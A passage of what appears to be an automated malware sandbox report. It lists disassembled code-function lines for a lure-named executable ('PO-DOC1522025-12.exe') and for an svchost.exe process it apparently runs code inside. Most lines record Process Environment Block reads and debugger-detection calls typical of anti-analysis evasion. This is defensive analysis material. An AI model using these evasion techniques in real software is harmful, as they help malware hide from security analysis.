            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00172622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00172622
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001442DE
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00164CE8 mov eax, dword ptr fs:[00000030h]0_2_00164CE8
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00F4C7D0 mov eax, dword ptr fs:[00000030h]0_2_00F4C7D0
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00F4DDE0 mov eax, dword ptr fs:[00000030h]0_2_00F4DDE0
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00F4DE40 mov eax, dword ptr fs:[00000030h]0_2_00F4DE40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
